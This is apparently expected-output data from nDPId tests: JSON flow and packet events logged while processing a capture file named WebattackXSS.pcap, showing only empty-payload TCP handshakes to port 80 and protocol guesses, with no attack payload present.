-00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8874,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":626,"flow_packet_id":3,"flow_last_seen":1499348038438,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348038438,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0j\/hAAD4GNeCsEAABwKgKMon0AFAYNXJhksCcVoAQAOXpNQAAAQEICgE8\/ZcD5s8K"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":551,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347905694,"flow_last_seen":1499347910877,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348039911,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33930,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":551,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347905694,"flow_last_seen":1499347910877,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348039911,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33930,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":552,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347908253,"flow_last_seen":1499347913877,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348039911,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33956,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":552,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347908253,"flow_last_seen":1499347913877,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348039911,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33956,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":553,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347909575,"flow_last_seen":1499347914878,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348039911,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33970,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":553,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347909575,"flow_last_seen":1499347914878,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348039911,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33970,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":554,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347912141,"flow_last_seen":1499347917877,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348039911,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33996,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":554,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347912141,"flow_last_seen":1499347917877,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348039911,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33996,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":555,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347913416,"flow_last_seen":1499347918877,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348039911,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34010,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":555,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347913416,"flow_last_seen":1499347918877,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348039911,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34010,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":556,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347914710,"flow_last_seen":1499347919878,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348039911,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34024,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":556,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347914710,"flow_last_seen":1499347919878,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348039911,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34024,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8894,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":627,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348041088,"flow_last_seen":1499348041088,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348041088,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35342,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8894,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":627,"flow_packet_id":1,"flow_last_seen":1499348041088,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348041088,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8l85AAD4GLgKsEAABwKgKMooOAFBaWpfjAAAAAKACchDg\/QAAAgQFtAQCCAoBPQAtAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8895,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":627,"flow_packet_id":2,"flow_last_seen":1499348041088,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348041088,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQig7ecTfrWlqX5KAScSD19wAAAgQFtAQCCAoD5tGhAT0ALQEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8896,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":627,"flow_packet_id":3,"flow_last_seen":1499348041088,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348041088,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0l89AAD4GLgmsEAABwKgKMooOAFBaWpfk3nE37IAQAOWU\/wAAAQEICgE9AC0D5tGh"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8903,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":628,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348042384,"flow_last_seen":1499348042384,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348042384,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35356,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8903,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":628,"flow_packet_id":1,"flow_last_seen":1499348042384,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348042384,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rjZAAD4GF5qsEAABwKgKMoocAFClJq9HAAAAAKACchB9ewAAAgQFtAQCCAoBPQFxAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8904,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":628,"flow_packet_id":2,"flow_last_seen":1499348042384,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348042384,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQihw9by\/zpSavSKAScSA6LAAAAgQFtAQCCAoD5tLlAT0BcQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8905,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":628,"flow_packet_id":3,"flow_last_seen":1499348042385,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348042385,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rjdAAD4GF6GsEAABwKgKMoocAFClJq9IPW8v9IAQAOXZMwAAAQEICgE9AXED5tLl"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8915,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":629,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348043670,"flow_last_seen":1499348043670,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348043670,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35370,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8915,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":629,"flow_packet_id":1,"flow_last_seen":1499348043670,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348043670,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8cMNAAD4GVQ2sEAABwKgKMooqAFAsTnJwAAAAAKACchAx2wAAAgQFtAQCCAoBPQKzAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8916,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":629,"flow_packet_id":2,"flow_last_seen":1499348043670,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348043670,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiirQJ1Z6LE5ycaAScSA0CwAAAgQFtAQCCAoD5tQmAT0CswEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8917,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":629,"flow_packet_id":3,"flow_last_seen":1499348043671,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348043671,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0cMRAAD4GVRSsEAABwKgKMooqAFAsTnJx0CdWe4AQAOXTEgAAAQEICgE9ArMD5tQm"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8933,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":630,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348046262,"flow_last_seen":1499348046262,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348046262,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35396,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8933,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":630,"flow_packet_id":1,"flow_last_seen":1499348046262,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348046262,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8bZhAAD4GWDisEAABwKgKMopEAFAJXWijAAAAAKACchBb9wAAAgQFtAQCCAoBPQU7AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8934,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":630,"flow_packet_id":2,"flow_last_seen":1499348046262,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348046262,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQikQJGz7wCV1opKAScSA6NQAAAgQFtAQCCAoD5tavAT0FOwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8935,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":630,"flow_packet_id":3,"flow_last_seen":1499348046263,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348046263,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0bZlAAD4GWD+sEAABwKgKMopEAFAJXWikCRs+8YAQAOXZPAAAAQEICgE9BTsD5tav"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8945,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":631,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348047547,"flow_last_seen":1499348047547,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348047547,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35410,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8945,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":631,"flow_packet_id":1,"flow_last_seen":1499348047547,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348047547,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8PrNAAD4Ghx2sEAABwKgKMopSAFC7TzjPAAAAAKACchDYiQAAAgQFtAQCCAoBPQZ8AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8946,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":631,"flow_packet_id":2,"flow_last_seen":1499348047547,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348047547,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQilKBYq9Yu0840KAScSDM1gAAAgQFtAQCCAoD5tfwAT0GfAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8947,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":631,"flow_packet_id":3,"flow_last_seen":1499348047547,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348047547,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0PrRAAD4GhySsEAABwKgKMopSAFC7TzjQgWKvWYAQAOVr3gAAAQEICgE9BnwD5tfw"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8966,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":632,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348050079,"flow_last_seen":1499348050079,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050079,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35436,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8966,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":632,"flow_packet_id":1,"flow_last_seen":1499348050079,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348050079,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Gn1AAD4Gq1OsEAABwKgKMopsAFCVUBKIAAAAAKACchAiPQAAAgQFtAQCCAoBPQj1AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8967,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":632,"flow_packet_id":2,"flow_last_seen":1499348050079,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348050079,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQimww3+sulVASiaAScSAovgAAAgQFtAQCCAoD5tppAT0I9QEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8968,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":632,"flow_packet_id":3,"flow_last_seen":1499348050080,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348050080,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Gn5AAD4Gq1qsEAABwKgKMopsAFCVUBKJMN\/rL4AQAOXHxQAAAQEICgE9CPUD5tpp"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":557,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347917322,"flow_last_seen":1499347922879,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34050,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":557,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347917322,"flow_last_seen":1499347922879,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34050,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":558,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347918608,"flow_last_seen":1499347923879,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34064,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":558,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347918608,"flow_last_seen":1499347923879,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34064,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":559,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347921170,"flow_last_seen":1499347926880,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34090,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":559,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347921170,"flow_last_seen":1499347926880,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34090,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":560,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347922471,"flow_last_seen":1499347927880,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34104,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":560,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347922471,"flow_last_seen":1499347927880,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34104,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":561,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347923737,"flow_last_seen":1499347928880,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34118,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 